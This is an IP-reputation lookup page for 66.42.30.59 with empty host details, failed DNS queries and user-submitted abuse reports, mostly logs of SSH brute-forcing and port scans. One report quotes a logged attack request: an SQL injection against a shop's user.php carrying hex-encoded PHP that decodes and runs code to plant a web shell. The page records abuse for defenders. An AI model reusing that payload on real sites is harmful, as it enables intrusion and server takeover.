66.42.30.59 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: United States of America (the)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
66.42.30.198	attack	Icarus honeypot on github	2020-08-24 09:23:48
66.42.30.235	attackbotsspam	Unauthorized connection attempt detected from IP address 66.42.30.235 to port 23	2020-06-29 03:04:39
66.42.30.74	attack	Unauthorized connection attempt detected from IP address 66.42.30.74 to port 23	2020-06-22 08:13:46
66.42.30.74	attackspambots	Unauthorized connection attempt detected from IP address 66.42.30.74 to port 23	2020-06-01 00:56:21
66.42.30.186	attack	Unauthorized connection attempt detected from IP address 66.42.30.186 to port 23	2020-05-30 01:39:01
66.42.30.74	attackbots	Unauthorized connection attempt detected from IP address 66.42.30.74 to port 23	2020-05-13 01:43:41
66.42.30.222	attackbots	" "	2020-04-14 05:10:07

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 66.42.30.59
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 17037
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;66.42.30.59.			IN	A

;; AUTHORITY SECTION:
.			29	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025021100 1800 900 604800 86400

;; Query time: 15 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Feb 11 23:15:39 CST 2025
;; MSG SIZE  rcvd: 104

Host info

b'Host 59.30.42.66.in-addr.arpa not found: 2(SERVFAIL)
'

Nslookup info:

server can't find 66.42.30.59.in-addr.arpa: SERVFAIL

Related IP info:

Related comments:

IP	Type	Details	Datetime
139.59.190.69	attackspambots	2019-08-12T12:26:14.016631abusebot-8.cloudsearch.cf sshd\[28426\]: Invalid user paintball1 from 139.59.190.69 port 46743	2019-08-12 20:43:58
58.216.151.146	attack	Invalid user adria from 58.216.151.146 port 37682	2019-08-12 20:09:23
113.76.206.38	attack	Aug 12 14:25:55 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.206.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:26:03 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.206.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:26:15 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.206.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:26:31 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.206.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:26:39 localhost postfix/smtpd\[26810\]: warning: unknown\[113.76.206.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2019-08-12 20:28:41
137.74.25.247	attack	Aug 12 13:04:13 vtv3 sshd\[608\]: Invalid user git from 137.74.25.247 port 35593 Aug 12 13:04:13 vtv3 sshd\[608\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=137.74.25.247 Aug 12 13:04:15 vtv3 sshd\[608\]: Failed password for invalid user git from 137.74.25.247 port 35593 ssh2 Aug 12 13:08:06 vtv3 sshd\[2648\]: Invalid user odoo from 137.74.25.247 port 60125 Aug 12 13:08:06 vtv3 sshd\[2648\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=137.74.25.247 Aug 12 13:19:19 vtv3 sshd\[8130\]: Invalid user ik from 137.74.25.247 port 48895 Aug 12 13:19:19 vtv3 sshd\[8130\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=137.74.25.247 Aug 12 13:19:22 vtv3 sshd\[8130\]: Failed password for invalid user ik from 137.74.25.247 port 48895 ssh2 Aug 12 13:23:09 vtv3 sshd\[10051\]: Invalid user test from 137.74.25.247 port 45027 Aug 12 13:23:09 vtv3 sshd\[10051\]: pam_unix$sshd:auth$: authe	2019-08-12 20:51:31
59.126.43.188	attackbotsspam	" "	2019-08-12 20:45:03
23.129.64.194	attack	no	2019-08-12 20:12:48
212.179.229.245	attackspam	Automatic report - Port Scan Attack	2019-08-12 20:23:41
165.22.20.94	attackspambots	Aug 12 04:26:18 ks10 sshd[11899]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.20.94 Aug 12 04:26:20 ks10 sshd[11899]: Failed password for invalid user sx from 165.22.20.94 port 40270 ssh2 ...	2019-08-12 20:17:57
104.236.131.54	attack	$f2bV_matches	2019-08-12 20:29:10
122.155.223.113	attack	Aug 12 11:34:58 shadeyouvpn sshd[5611]: Invalid user usuario from 122.155.223.113 Aug 12 11:34:58 shadeyouvpn sshd[5611]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.155.223.113 Aug 12 11:35:01 shadeyouvpn sshd[5611]: Failed password for invalid user usuario from 122.155.223.113 port 60404 ssh2 Aug 12 11:35:01 shadeyouvpn sshd[5611]: Received disconnect from 122.155.223.113: 11: Bye Bye [preauth] Aug 12 11:43:50 shadeyouvpn sshd[13798]: Invalid user SinusBot from 122.155.223.113 Aug 12 11:43:50 shadeyouvpn sshd[13798]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.155.223.113 Aug 12 11:43:52 shadeyouvpn sshd[13798]: Failed password for invalid user SinusBot from 122.155.223.113 port 33296 ssh2 Aug 12 11:43:52 shadeyouvpn sshd[13798]: Received disconnect from 122.155.223.113: 11: Bye Bye [preauth] Aug 12 11:44:55 shadeyouvpn sshd[14291]: Invalid user angelina from 122.155.223......... -------------------------------	2019-08-12 20:35:26
142.44.210.154	attack	Aug 12 14:09:46 myhostname sshd[10427]: Invalid user iam from 142.44.210.154 Aug 12 14:09:46 myhostname sshd[10427]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.44.210.154 Aug 12 14:09:48 myhostname sshd[10427]: Failed password for invalid user iam from 142.44.210.154 port 45016 ssh2 Aug 12 14:09:48 myhostname sshd[10427]: Received disconnect from 142.44.210.154 port 45016:11: Bye Bye [preauth] Aug 12 14:09:48 myhostname sshd[10427]: Disconnected from 142.44.210.154 port 45016 [preauth] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=142.44.210.154	2019-08-12 20:52:20
46.161.27.87	attackbots	Aug 12 14:11:01 h2177944 kernel: \[3935626.844314\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=3773 PROTO=TCP SPT=48938 DPT=3303 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:11:01 h2177944 kernel: \[3935627.108175\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=47524 PROTO=TCP SPT=48938 DPT=3073 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:18:08 h2177944 kernel: \[3936053.519543\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=2822 PROTO=TCP SPT=48938 DPT=3305 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:22:06 h2177944 kernel: \[3936291.596728\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=18435 PROTO=TCP SPT=48938 DPT=3130 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:26:09 h2177944 kernel: \[3936534.575964\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40	2019-08-12 20:46:57
186.183.185.82	attack	[ER hit] Tried to deliver spam. Already well known.	2019-08-12 20:27:08
104.148.105.4	attackbots	104.148.105.4 - - [12/Aug/2019:08:25:50 -0400] "GET /user.php?act=login HTTP/1.1" 301 257 "554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:288:"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" ...	2019-08-12 21:00:46
120.3.194.217	attackspam	Unauthorised access (Aug 12) SRC=120.3.194.217 LEN=40 TTL=49 ID=35396 TCP DPT=8080 WINDOW=56941 SYN Unauthorised access (Aug 12) SRC=120.3.194.217 LEN=40 TTL=49 ID=63437 TCP DPT=8080 WINDOW=56941 SYN Unauthorised access (Aug 11) SRC=120.3.194.217 LEN=40 TTL=49 ID=43536 TCP DPT=8080 WINDOW=56941 SYN	2019-08-12 20:36:39

Recently Reported IPs

136.61.165.223	247.71.224.246	132.253.246.17	69.49.231.8
101.151.176.206	39.183.135.63	142.76.193.39	5.125.136.152
84.9.168.129	45.90.19.25	20.101.179.57	26.74.203.169
143.175.217.168	187.154.108.203	126.59.119.131	69.84.255.154
99.198.5.88	227.107.182.84	23.169.130.41	133.99.12.60